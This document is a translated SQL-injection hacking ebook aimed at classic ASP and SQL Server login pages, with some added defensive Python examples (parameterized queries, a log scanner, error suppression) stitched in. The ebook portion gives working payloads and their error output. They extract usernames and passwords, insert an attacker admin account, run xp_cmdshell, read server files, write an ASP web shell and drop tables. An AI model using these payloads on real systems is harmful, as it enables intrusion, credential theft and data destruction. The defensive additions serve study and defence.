<%
    Response.write(rso("Username"));
    Response.write( "</BODY></HTML>" );
    Response.end
  }
}

function Main()
{
  //Set up connection
  var username
  var cn = Server.createobject( "ADODB.Connection" );
  cn.connectiontimeout = 20;
  cn.open( "localserver", "sa", "password" );
  username = new String( Request.form("username") );
  if( username.length > 0)
  {
    Login( cn );
  }
  cn.close();
}
Main();
%>
Here is the SQL query:
var sql = "select * from users where username = '" + username + "'and password = '" + password + "'";
if a hacker enters the following:
then the users table will be deleted, and we can bypass the login with the following method: you all know the bypass already, so I will not repeat it - (See again "Basics of hacking a website vulnerable to SQL Injection")
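As an added example (not the ebook's code, and not from the paper this section paraphrases), here is the Login() construction from process_login.asp rewritten in Python against SQLite beside a parameterized version, with a small probe() helper that classifies each attempt as error, denied or granted. SQLite stands in for SQL Server (the error text differs, the failure mode does not); the users table is the one created a few lines below on this page, and the union string is the page's own later probe, used here only to show how each version treats it.

```python
"""The concatenated login query from process_login.asp beside a parameterized
version, both run against SQLite.

Added example, not the ebook's or the paper's code. The users table is the one
created on this page; SQLite stands in for SQL Server, so the error text differs
but the failure mode (a stray quote changes the statement) is the same.
"""
import sqlite3

# The page's own union probe, used here only to show how each version treats it.
UNION_PAYLOAD = "' union select password,1,1,1 from users where username ='admin'--"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users( id int, username varchar(255), password varchar(255), privs int )")
    con.executemany("insert into users values (?, ?, ?, ?)", [
        (0, "admin", "r00tr0x!", 0xffff),
        (0, "guest", "guest", 0x0000),
        (0, "chris", "password", 0x00ff),
    ])
    return con


def login_vulnerable(con, username, password):
    """Same construction as Login() in process_login.asp: input is pasted into the SQL text."""
    sql = ("select * from users where username = '" + username
           + "' and password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return None if row is None else str(row[1])   # whatever landed in the username column


def login_fixed(con, username, password):
    """Parameterized form: values are sent separately, so quotes in the input stay data."""
    sql = "select username from users where username = ? and password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return None if row is None else row[0]


def probe(con, login, username, password):
    """Run one attempt and summarise it as 'error', 'denied' or 'granted:<name>'."""
    try:
        user = login(con, username, password)
    except sqlite3.OperationalError:
        return "error"          # the stray quote broke the statement (the jo'hn case)
    return "denied" if user is None else f"granted:{user}"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        print(name, "jo'hn ->", probe(db, fn, "jo'hn", "x"))
        print(name, "union ->", probe(db, fn, UNION_PAYLOAD, "x"))
        print(name, "admin ->", probe(db, fn, "admin", "r00tr0x!"))
```

With the concatenated query, jo'hn produces a syntax error and the union string is granted access with a value from another column in the "username" slot; with the parameterized query both are plain login failures and only the real credentials are granted. The same change, binding parameters instead of concatenating, is the fix for every injection on this page.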
create table users( id int, username varchar(255), password varchar(255), privs int )
and insert into it:
insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
Error generated:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35
Continue getting the remaining ones:
Username: ' group by users.id having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35
Continue until no more errors are reported, then stop; now you know the table and the columns to exploit, and next we get their values. To determine a column's content we use the sum() function:
Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35
Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35
So we can insert into the database: Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--
Get the server version:
Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int. /process_login.asp, line 35
You could use convert(), but here I am showing you union; you get the contents of the users in the table as follows:
Username: ' union select min(username),1,1,1 from users where username > 'a'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. /process_login.asp, line 35
Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int. /process_login.asp, line 35
Username: ' union select password,1,1,1 from users where username ='admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35
Create a script like this:
begin
declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo
end
Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--
Continue:
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35
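The login page in the examples above concatenates the username straight into its SQL statement, which is what lets a union clause ride in on the error channel. The following is an added example, not code from the ebook or from the process_login.asp application it describes: it recreates the users table in an in-memory SQLite database (constructed sample rows using the names quoted above), runs the ebook's own union payload through a concatenated query and through a parameterized one, and shows that only the concatenated version hands back the admin password. SQLite is an assumption standing in for SQL Server; the column list (id, username, password, privs) is inferred from the insert payload above.

```python
import sqlite3

# Constructed sample rows (not data from any real site), using the four columns
# implied by the ebook's insert payload: id, username, password, privs.
SAMPLE_USERS = [
    (1, "admin", "r00tr0x!", 0xffff),
    (2, "guest", "guest", 0),
    (3, "chris", "password", 0),
    (4, "fred", "sesame", 0),
]

# One of the union payloads quoted above, reused unchanged as the test input.
UNION_PAYLOAD = "' union select password,1,1,1 from users where username ='admin'--"


def make_db():
    """In-memory SQLite stand-in (an assumption) for the SQL Server database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id int, username text, password text, privs int)")
    conn.executemany("insert into users values (?,?,?,?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation, as process_login.asp does.
    A quote in the input closes the literal and the rest is executed as SQL."""
    sql = ("select * from users where username='" + username
           + "' and password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same logic with bound parameters: the statement text is fixed and the
    values travel separately, so input can never alter the query shape."""
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


def first_column(rows):
    """What a page or error message built from the result would expose."""
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", first_column(login_vulnerable(db, UNION_PAYLOAD, "x")))
    print("parameterized:", first_column(login_parameterized(db, UNION_PAYLOAD, "x")))
    print("real login   :", len(login_parameterized(db, "admin", "r00tr0x!")), "row(s)")
```

With the concatenated query the union row comes back and its first column is the admin password; with bound parameters the same input is just a username that matches nobody, while a genuine admin/r00tr0x! login still returns its one row. On SQL Server the same change applies to ADO command parameters in the ASP page; the driver then never sees the quote as SQL.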
Erasing traces:
Once a hacker is able to read the database, they will want to go further and take control of the server's network system as well. Some of the ways:
1- Use xp_cmdshell when you have 'sa' rights
2- Use xp_regread to read the registry, including the SAM
3- Run linked queries on the server
4- Create scripts on the server to exploit it
5- Use 'bulk insert' to read any file on the system
6- Use bcp to create text files on the server
7- Use sp_OACreate, sp_OAMethod and sp_OAGetProperty to create (ActiveX) scripts that run on the server
[xp_cmdshell]
You have surely heard a lot about this already. For example:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'
[xp_regread]
Related functions...
Example:
etc.. and many more
[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
create table foo( line varchar(8000) )
then:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
Example: bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
Using 'wscript.shell'
e.g.:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
In the query:
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
Using 'scripting.filesystemobject' to read a file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
These are methods you can use very effectively; build on these basic instructions and get creative.
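Every technique in this part leaves a distinctive token in the request (xp_cmdshell, sp_oacreate, bulk insert, union select, information_schema, @@version). The block below is an added example written from the defender's side, not part of the ebook: it scans constructed IIS-style log lines for those tokens after URL-decoding the query string, so that payloads spaced with %20 or + are caught as well. The log layout, IP addresses and request lines are all made up for the example; standard IIS logs do not contain POST bodies, so the same check would have to run on whatever the application itself logs for form submissions.

```python
import re
from urllib.parse import unquote_plus

# Tokens used by the techniques in this part of the ebook, matched as regexes
# over the decoded, lower-cased, whitespace-folded query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "error_convert": re.compile(r"\bconvert\s*\(\s*int\b"),
    "version_probe": re.compile(r"@@version"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "xp_regread": re.compile(r"\bxp_regread\b"),
    "xp_servicecontrol": re.compile(r"\bxp_servicecontrol\b"),
    "bulk_insert": re.compile(r"\bbulk\s+insert\b"),
    "ole_automation": re.compile(r"\bsp_oa(create|method|getproperty)\b"),
}

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# Addresses come from documentation ranges; the requests are made up for the example.
SAMPLE_LOG = """\
2004-03-01 10:00:01 192.0.2.9 GET /shop/shopdisplayproducts.asp id=6 200
2004-03-01 10:00:30 192.0.2.9 GET /process_login.asp username=guest&password=guest 302
2004-03-01 10:01:12 198.51.100.7 GET /process_login.asp username='+union+select+@@version,1,1,1-- 500
2004-03-01 10:01:30 198.51.100.7 GET /process_login.asp username=';+exec+master..xp_cmdshell+'dir'-- 500
2004-03-01 10:01:55 198.51.100.7 GET /process_login.asp username='%20union%20select%20vpass,1,1,1%20from%20vtable%20where%20vuser='admin'-- 500
2004-03-01 10:02:44 198.51.100.7 GET /process_login.asp username='+%2b+convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
"""


def decode_query(raw):
    """Undo URL encoding ('+' and %20 both become a space) and fold whitespace,
    so that the same payload spaced in different ways matches the same pattern."""
    text = unquote_plus(raw)
    return re.sub(r"\s+", " ", text).lower()


def scan_log(log_text):
    """Return one finding per suspicious request as
    (line_no, client_ip, uri_stem, [indicator names]); clean lines produce nothing."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split()
        if len(parts) < 7:
            continue  # not in the constructed seven-field layout
        client_ip, uri_stem, raw_query = parts[2], parts[4], parts[5]
        query = decode_query(raw_query)
        hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if hits:
            findings.append((line_no, client_ip, uri_stem, hits))
    return findings


if __name__ == "__main__":
    for line_no, ip, stem, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} {stem} -> {', '.join(hits)}")
```

The two benign requests produce no findings; the four others are all attributed to one client, which is the grouping a responder wants (a single source walking from version probe to xp_cmdshell). Decoding before matching matters because the ebook's own URLs use %20 and %2b, and a pattern written against the raw log text would miss them.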
Login page (or any injection page):
username: ' having 1=1--
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
So we have the column Vuser
2) UNION, fast and effective
username : ' Union select [column] from [table] where [column2=...]--
password : anything
Example: Suppose we know that the two columns username and password in table VTABLE of the victim database are VUSER and VPASS; then we do the following
username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password : anything
(1): Here admin is a user you know; if you don't know one, you can leave it blank and it will give you the first user
Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
If the result looks like the above, it means you have to union more columns until every column of table VTABLE is covered by the union. Its structure is as follows:
username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password : anything
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.
Yes, friends, SQL injection is really interesting, and this is what we can do in today's article of mine: dump the opponent's entire database.
3) Getting every value of a known column in a known table. The trick here is Not in. Its structure is as follows (using the example with the column from the previous part): with Vuser being admin we can get the other users
Login Page:
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)
Yes, after that we get one more user; just add it inside the Not in (e.g. Not in (admin,hacker,...)) and keep going like that and we will get every user (and of course every password after that).
**** To get the list of user names according to a rule you choose, for example only the users containing the word admin, we use like. Structure:
Login Page:
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like %admin%
4) Getting every table and column of the database: the trick is this table of the database: INFORMATION_SCHEMA.TABLES with column TABLE_NAME (which holds every table), and the table INFORMATION_SCHEMA.COLUMNS with column COLUMN_NAME (which holds every column)
Login page:
username: UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and
The above is the most basic material on SQL injection I can give you; to do it well you still need a little creativity. I hope it helps you a bit when you come across a site vulnerable to SQL injection.
5) No need for UNION: if you dislike using Union because of its inconveniences, you can use "Convert" more easily to collect info from the error messages
Structure:
login page:
The above is an example of getting the version; now, to get any info you want you just substitute for the "select @@version" part, but remember, if it's the first time you get info, add TOP 1.
e.g.: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--
e.g.: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--
Structure:
e.g.: '; DROP TABLE VTABLE--
If you know SQL well you can do many interesting things with this, but I'll leave that part for you to research on your own.
End of the Ebook. Good luck. Hacking is only about learning and sharpening security skills. http://thegioiebook.com
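Sections 1, 2 and 5 all depend on one thing: the ODBC error text being rendered into the page the client receives. The block below is an added example, not code from the ebook: it runs the convert payload from above against a small SQLite stand-in (the VTABLE/Vuser/Vpass names and the 'tuibihackroi' value are the ebook's placeholders) and contrasts a handler that returns the raw database error with one that logs it server-side and returns a fixed message. SQLite rejects convert() with a plain name-resolution error rather than echoing a data value the way SQL Server's type-conversion message does, so the block demonstrates the handling pattern rather than the leak itself; the query is left concatenated on purpose to show that this is only a second layer, and parameterizing the statement remains the primary fix.

```python
import sqlite3

GENERIC_MESSAGE = "Login failed."   # the only text a client ever receives
SERVER_LOG = []                     # stand-in for a server-side log file

# Payload quoted in section 5 of the ebook, reused unchanged as the test input.
CONVERT_PAYLOAD = "' + convert (int,(select Vpass from Vtable where Vuser='admin'))--"


def make_db():
    """In-memory SQLite stand-in (an assumption); names and value are the ebook's placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Vtable (Vuser text, Vpass text)")
    conn.execute("insert into Vtable values ('admin', 'tuibihackroi')")
    return conn


def lookup_verbose(conn, username):
    """Default classic-ASP behaviour: an unhandled database error is rendered
    into the 500 page, so every word of the DBMS message reaches the client."""
    sql = "select Vpass from Vtable where Vuser='" + username + "'"   # concatenated on purpose
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Database error: " + str(exc)
    return "OK" if rows else GENERIC_MESSAGE


def lookup_quiet(conn, username):
    """Same query, but the exception is caught, written to the server log
    together with the statement that caused it, and replaced by a fixed message."""
    sql = "select Vpass from Vtable where Vuser='" + username + "'"   # still concatenated
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        SERVER_LOG.append({"sql": sql, "error": str(exc)})  # detail stays on the server
        return GENERIC_MESSAGE
    return "OK" if rows else GENERIC_MESSAGE


if __name__ == "__main__":
    db = make_db()
    print("verbose:", lookup_verbose(db, CONVERT_PAYLOAD))
    print("quiet  :", lookup_quiet(db, CONVERT_PAYLOAD))
    print("logged :", SERVER_LOG[-1]["error"])
```

The verbose handler returns whatever the database said; the quiet one returns the same fixed string for a failed lookup and for a broken statement, so the response no longer distinguishes between the two and the error-based extraction loop has nothing to read. The logged entry keeps the statement, which is also what an analyst needs to see that a payload was tried.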